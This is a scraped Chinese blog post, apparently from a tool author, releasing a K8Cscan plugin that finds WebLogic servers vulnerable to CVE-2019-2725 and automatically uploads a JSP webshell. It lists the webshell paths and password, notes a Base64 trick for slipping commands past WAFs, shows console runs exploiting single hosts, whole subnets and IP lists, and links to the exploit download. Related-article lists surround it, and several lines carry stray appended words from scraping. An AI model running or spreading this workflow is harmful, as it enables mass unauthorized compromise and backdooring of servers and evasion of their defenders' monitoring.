[原創]K8Cscan插件之Weblogic CVE-2019-2725 GetShell Exploit(內網滲透/支持批量/可跨網段)
主程序: K8Cscan 大型內網滲透自定義掃描器html
http://www.javashuo.com/article/p-xhgigpwl-kn.htmlgit
WeblogicScan插件github
K8Cscan Moudle WeblogicScan & Exploit
目前僅支持漏洞編號 CNVD-C-2019-48814
該版本爲探測weblogic漏洞並自動GetShell
外網可當成EXP使用,也可內網自動滲透用
不管內外網都可批量(填寫ip或ip段列表便可)web
(弄exp的時候還沒CVE,因此回顯寫着CNVD,過了兩天才有CVE-2019-2725,同一個漏洞不一樣叫法而已你們不要慌)shell
3.6支持URL和IP端口bash
用法:jsp
K8cmdshell 向兩個默認路徑上傳webshell
使用飛刀cmd鏈接,通過Base64加密可過waf
傳輸CMD命令不加密,容易被WAF攔截或管理員發現
http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom //http://192.168.1.106:7001/_async/shell.jsp tom //http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom 指定IP(當成EXP用,填寫內網或外網IP便可) C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106 Cscan 3.5 By K8gege load netscan.dll 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited Finished! 指定C段 C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24 Cscan 3.5 By K8gege load netscan.dll Segment: 192.168.1.0 ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.1 192.168.1.105 192.168.1.108 192.168.1.100 ============================================= onlinePC:5 Finished! 指定IP列表同目錄下ip.txt(示例掃描3個IP) C:\Users\K8team\Desktop\Cscan>Cscan20.exe Cscan 3.5 By K8gege load netscan.dll scan ip.txt (IP) ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.105 192.168.1.1 ============================================= onlinePC:3 Finished! 指定C段列表同目錄下ipc.txt(示例掃描一個IP段) C:\Users\K8team\Desktop\Cscan>Cscan20.exe Cscan 3.5 By K8gege load netscan.dll scan ipc.txt (IP/24) Segment: 192.168.1.0 ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.1 192.168.1.105 192.168.1.108 ============================================= onlinePC:4 Finished!
三、下載async
自動Getshellflex
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20%26%20Exploit.rar加密
僅掃描漏洞
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20Only%20Poc.rar
主程序
相關文章
- 1. [原創]K8Cscan插件之Weblogic CVE-2019-2725 GetShell Exploit(內網滲透/支持批量/可跨網段)
- 2. [原創]K8Cscan插件之多種方式系統版本探測(內網滲透/支持批量/可跨網段)
- 3. [原創]K8Cscan插件之Windows密碼爆破(內網滲透/支持批量/可跨網段)
- 4. [原創]K8Cscan插件之端口掃描C#源碼(內網滲透/支持批量/可跨網段)
- 5. [原創]K8Cscan插件之Mysql密碼爆破(內網滲透/支持批量/可跨網段)
- 6. [原創]K8Cscan插件之存活主機掃描(內網滲透/支持批量/可跨網段)
- 7. [原創]K8Cscan插件之FTP弱口令掃描(內網滲透/支持批量/可跨網段)
- 8. [原創]K8Cscan插件之Weblogic漏洞掃描&GetShell Exploit
- 9. [原創]K8Cscan 5.4大型內網滲透插件化掃描器(支持批量C段/B段/A段/IP列表/URL列表/跨網段掃描)
- 10. [原創]K8Cscan插件之Cisco思科設備掃描(IP、設備型號、主機名、Boot、硬件版本)(內網滲透/支持批量/可跨網段)
- 更多相關文章...
- • R 繪圖 - 中文支持 - R 語言教程
- • Maven 插件 - Maven教程
- • 互聯網組織的未來:剖析GitHub員工的任性之源
- • IntelliJ IDEA安裝代碼格式化插件
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. [原創]K8Cscan插件之Weblogic CVE-2019-2725 GetShell Exploit(內網滲透/支持批量/可跨網段)
- 2. [原創]K8Cscan插件之多種方式系統版本探測(內網滲透/支持批量/可跨網段)
- 3. [原創]K8Cscan插件之Windows密碼爆破(內網滲透/支持批量/可跨網段)
- 4. [原創]K8Cscan插件之端口掃描C#源碼(內網滲透/支持批量/可跨網段)
- 5. [原創]K8Cscan插件之Mysql密碼爆破(內網滲透/支持批量/可跨網段)
- 6. [原創]K8Cscan插件之存活主機掃描(內網滲透/支持批量/可跨網段)
- 7. [原創]K8Cscan插件之FTP弱口令掃描(內網滲透/支持批量/可跨網段)
- 8. [原創]K8Cscan插件之Weblogic漏洞掃描&GetShell Exploit
- 9. [原創]K8Cscan 5.4大型內網滲透插件化掃描器(支持批量C段/B段/A段/IP列表/URL列表/跨網段掃描)
- 10. [原創]K8Cscan插件之Cisco思科設備掃描(IP、設備型號、主機名、Boot、硬件版本)(內網滲透/支持批量/可跨網段)